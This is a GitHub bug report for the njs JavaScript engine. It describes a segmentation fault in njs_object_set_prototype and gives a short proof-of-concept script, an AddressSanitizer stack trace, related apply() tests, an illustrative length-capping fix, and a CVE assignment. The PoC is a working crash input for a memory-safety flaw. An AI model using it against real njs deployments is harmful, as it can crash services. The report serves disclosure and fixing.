
SEGV /njs/src/njs_object.c:2136:24 in njs_object_set_prototype #449

Closed
anonym0us1337 opened this issue Dec 24, 2021 · 2 comments

@anonym0us1337

Env

Version    : 0.7.0
Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548
OS         : Ubuntu 20.04
Configure  : ./configure --address-sanitizer=YES

POC

function main() {
    const v3 = [23490,23490,23490,23490];
    const v4 = {};
    v3.length = 1577595327;            // raise the array length to a huge (sparse) value
    const v9 = Object.apply(...v4,v3); // hand that array to apply() as the argument list
    v3.__proto__ = v9;                 // the __proto__ setter then faults in njs_object_set_prototype
}
main();

Stack Dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==466519==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000050d6d4 bp 0x7ffc8e2432f0 sp 0x7ffc8e2432e0 T0)
==466519==The signal is caused by a READ memory access.
==466519==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x50d6d4 in njs_object_set_prototype /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24
    #1 0x50d6d4 in njs_object_prototype_proto /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2162:19
    #2 0x4d9f03 in njs_value_property_set /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_value.c:1215:19
    #3 0x4e45f5 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:658:23
    #4 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11
    #5 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23
    #6 0x4dea17 in njs_vm_start /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:493:11
    #7 0x4c7f3d in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:881:19
    #8 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11
    #9 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15
    #10 0x7f3d5b6190b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==466519==ABORTING

Credit

P1umer, afang5472, Kotori of NeSE@IIE

@drsm
Contributor

drsm commented Dec 24, 2021

maybe related:

>> (() => {}).apply({}, Array(2**10));
undefined
>> (() => {}).apply({}, Array(2**13));
Thrown:
RangeError: Maximum call stack size exceeded
    at Function.prototype.apply (native)
    at main (shell:1)

>> (() => {}).apply({}, Array(2**30));
undefined
>> (() => {}).apply({}, Array(2**32));
Thrown:
RangeError: Invalid array length
    at Array (native)
    at Function.prototype.apply (native)
    at main (shell:1)
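
The PoC and drsm's follow-up both hinge on a script-controlled `length` reaching the native apply() path. As an added illustration, not njs's own code, here is a spec-style CreateListFromArrayLike with an explicit argument cap (MAX_APPLY_ARGS is a value chosen for this example), so an oversized length is refused before any argument list is built:

```javascript
// Added illustration, not njs code: a spec-style CreateListFromArrayLike with
// an explicit argument-count cap, so a script-controlled `length` is bounded
// before the argument list is ever materialised.

// Assumption: demo cap; a real engine chooses its own limit.
const MAX_APPLY_ARGS = 65535;

// ES ToLength: NaN or negative -> 0, otherwise clamp to 2^53 - 1.
function toLength(v) {
  const n = Number(v);
  if (Number.isNaN(n) || n <= 0) return 0;
  return Math.min(Math.floor(n), Number.MAX_SAFE_INTEGER);
}

// Copy obj[0..len) into a fresh dense array, rejecting absurd lengths first.
function createListFromArrayLike(obj) {
  if (obj === null || (typeof obj !== "object" && typeof obj !== "function")) {
    throw new TypeError("CreateListFromArrayLike called on non-object");
  }
  const len = toLength(obj.length);
  if (len > MAX_APPLY_ARGS) {
    throw new RangeError("argument list too long: " + len);
  }
  const list = new Array(len);
  for (let i = 0; i < len; i++) list[i] = obj[i];
  return list;
}

// Guarded apply(): the callee only ever sees a bounded, dense argument list.
function safeApply(fn, thisArg, argArray) {
  if (typeof fn !== "function") throw new TypeError("apply target is not callable");
  if (argArray === undefined || argArray === null) return Reflect.apply(fn, thisArg, []);
  return Reflect.apply(fn, thisArg, createListFromArrayLike(argArray));
}

// Constructed sample mirroring the report: a 4-element array whose `length`
// is raised to 1577595327 before being handed to apply().
function demo() {
  const countArgs = (...args) => args.length;
  const v3 = [23490, 23490, 23490, 23490];
  const before = safeApply(countArgs, null, v3);   // 4
  v3.length = 1577595327;                          // sparse; nothing is allocated yet
  let rejected = false;
  try { safeApply(countArgs, null, v3); } catch (e) { rejected = e instanceof RangeError; }
  return { before, rejected };
}
```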

@xeioex xeioex removed the fuzzer label Jan 18, 2022
@xeioex xeioex self-assigned this Jan 18, 2022
@xeioex xeioex added the fuzzer label Jan 18, 2022
@P1umer

P1umer commented Feb 15, 2022

This issue was assigned CVE-2021-46462.
